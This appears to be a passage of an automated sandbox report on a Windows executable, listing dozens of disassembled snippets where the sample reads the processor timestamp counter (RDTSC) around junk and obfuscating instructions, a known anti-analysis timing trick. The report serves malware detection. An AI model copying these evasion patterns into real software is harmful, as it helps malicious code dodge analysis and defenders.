                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7704D second address: F77054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77054 second address: F77059 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F77059 second address: F77061 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620190 second address: 56201A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BEEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201A2 second address: 56201A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201A6 second address: 56201CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3DE9170BECh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F3DE9170BEAh 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56201CC second address: 56201DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E70 second address: 5600E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, ax 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E78 second address: 5600E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E89 second address: 5600E8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600E8F second address: 5600EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3DE916F962h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F3DE916F95Bh 0x0000000f adc eax, 03F3D76Eh 0x00000015 jmp 00007F3DE916F969h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esp], ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3DE916F95Dh 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600EE6 second address: 5600EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650033 second address: 565004F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 mov ebx, 1E1EFBC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov si, 4095h 0x00000018 movzx eax, dx 0x0000001b popad 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565004F second address: 5650055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650055 second address: 5650059 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650059 second address: 565008F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F3DE9170BF2h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F3DE9170BF7h 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E00D2 second address: 55E0128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3DE916F95Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 movsx edx, cx 0x00000014 jmp 00007F3DE916F95Ah 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3DE916F967h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E0128 second address: 55E013C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ax, di 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55E013C second address: 55E0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600CBE second address: 5600D34 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3DE9170BEAh 0x00000008 jmp 00007F3DE9170BF5h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F3DE9170BEEh 0x00000017 push eax 0x00000018 jmp 00007F3DE9170BEBh 0x0000001d xchg eax, ebp 0x0000001e pushad 0x0000001f mov bl, ch 0x00000021 mov si, dx 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F3DE9170BF3h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F3DE9170BF5h 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560073B second address: 5600741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600741 second address: 5600747 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600747 second address: 560074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560074B second address: 560074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560074F second address: 560076B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F3DE916F961h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560076B second address: 5600799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3DE9170BF1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600799 second address: 56007B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE916F967h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56007B4 second address: 56007B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56007B8 second address: 56007C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56007C8 second address: 56007CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56007CC second address: 56007D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56007D2 second address: 5600805 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 pushfd 0x00000007 jmp 00007F3DE9170BF0h 0x0000000c or ch, 00000078h 0x0000000f jmp 00007F3DE9170BEBh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov eax, edi 0x0000001e movsx ebx, cx 0x00000021 popad 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560067F second address: 5600687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600687 second address: 5600695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600695 second address: 560069B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560069B second address: 56006B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56006B0 second address: 5600710 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F961h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F3DE916F95Eh 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov al, 33h 0x00000016 mov dh, 7Fh 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F3DE916F967h 0x00000023 jmp 00007F3DE916F963h 0x00000028 popfd 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600710 second address: 5600715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56003B5 second address: 560042F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F3DE916F95Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F3DE916F95Ch 0x00000019 sbb esi, 6566F8B8h 0x0000001f jmp 00007F3DE916F95Bh 0x00000024 popfd 0x00000025 pushfd 0x00000026 jmp 00007F3DE916F968h 0x0000002b or cx, 3318h 0x00000030 jmp 00007F3DE916F95Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560042F second address: 5600447 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5600447 second address: 560049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3DE916F95Dh 0x00000010 adc cx, 5F66h 0x00000015 jmp 00007F3DE916F961h 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F3DE916F960h 0x00000021 sbb ch, 00000008h 0x00000024 jmp 00007F3DE916F95Bh 0x00000029 popfd 0x0000002a popad 0x0000002b mov ebp, esp 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 561027B second address: 5610281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610281 second address: 5610285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610285 second address: 5610289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5610289 second address: 561029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov dx, 8AD0h 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F02 second address: 5640F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F06 second address: 5640F23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F969h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F23 second address: 5640F29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F29 second address: 5640F49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F963h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F49 second address: 5640F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F4D second address: 5640F53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640F53 second address: 5640F70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE9170BF9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620540 second address: 5620544 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620544 second address: 562054A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562054A second address: 5620590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE916F95Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007F3DE916F969h 0x00000015 jmp 00007F3DE916F95Bh 0x0000001a popfd 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620590 second address: 56205AC instructions: 0x00000000 rdtsc 0x00000002 mov ch, 6Bh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 call 00007F3DE9170BF3h 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56205AC second address: 56205B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56205B0 second address: 56205E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3DE9170BEBh 0x00000011 jmp 00007F3DE9170BF3h 0x00000016 popfd 0x00000017 mov bl, cl 0x00000019 popad 0x0000001a and dword ptr [eax], 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 movzx esi, bx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56205E9 second address: 56205EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 560059C second address: 56005A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56005A0 second address: 56005A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620008 second address: 562000C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562000C second address: 5620012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620012 second address: 5620018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620018 second address: 562001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562001C second address: 5620020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620020 second address: 562003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F3DE916F95Dh 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562003C second address: 5620090 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F3DE9170BF1h 0x00000011 xor ax, 0596h 0x00000016 jmp 00007F3DE9170BF1h 0x0000001b popfd 0x0000001c mov dx, cx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F3DE9170BEFh 0x00000029 pop eax 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620090 second address: 562009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3DE916F95Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562009F second address: 56200C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 movsx edi, ax 0x00000013 mov cl, D7h 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56200C9 second address: 562012E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3DE916F95Ch 0x00000009 and al, FFFFFFA8h 0x0000000c jmp 00007F3DE916F95Bh 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F3DE916F968h 0x00000018 and ecx, 04483C08h 0x0000001e jmp 00007F3DE916F95Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3DE916F965h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562012E second address: 5620134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620134 second address: 5620138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620138 second address: 562013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562038B second address: 5620398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov ch, DDh 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620398 second address: 562039E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562039E second address: 56203F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov esi, 6389559Bh 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F3DE916F95Ah 0x00000014 xor esi, 21720468h 0x0000001a jmp 00007F3DE916F95Bh 0x0000001f popfd 0x00000020 mov bx, cx 0x00000023 popad 0x00000024 movzx ecx, di 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d call 00007F3DE916F968h 0x00000032 pop ecx 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56203F2 second address: 562040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3DE9170BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bl, 25h 0x0000000f mov dx, si 0x00000012 popad 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 562040E second address: 5620414 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620414 second address: 5620418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5620418 second address: 562041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56406CD second address: 56406E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F3DE9170BECh 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56406E7 second address: 564074F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 4C639FCAh 0x0000000b popad 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F3DE916F967h 0x00000014 sbb eax, 0B181B1Eh 0x0000001a jmp 00007F3DE916F969h 0x0000001f popfd 0x00000020 mov ecx, 23C5A4E7h 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b call 00007F3DE916F966h 0x00000030 pop ecx 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564074F second address: 564076D instructions: 0x00000000 rdtsc 0x00000002 mov cx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, edi 0x00000009 popad 0x0000000a push ebp 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f push edx 0x00000010 mov cl, 6Ch 0x00000012 pop edi 0x00000013 popad 0x00000014 mov dword ptr [esp], ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov cx, bx 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564076D second address: 5640773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640773 second address: 5640777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5640777 second address: 564077B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
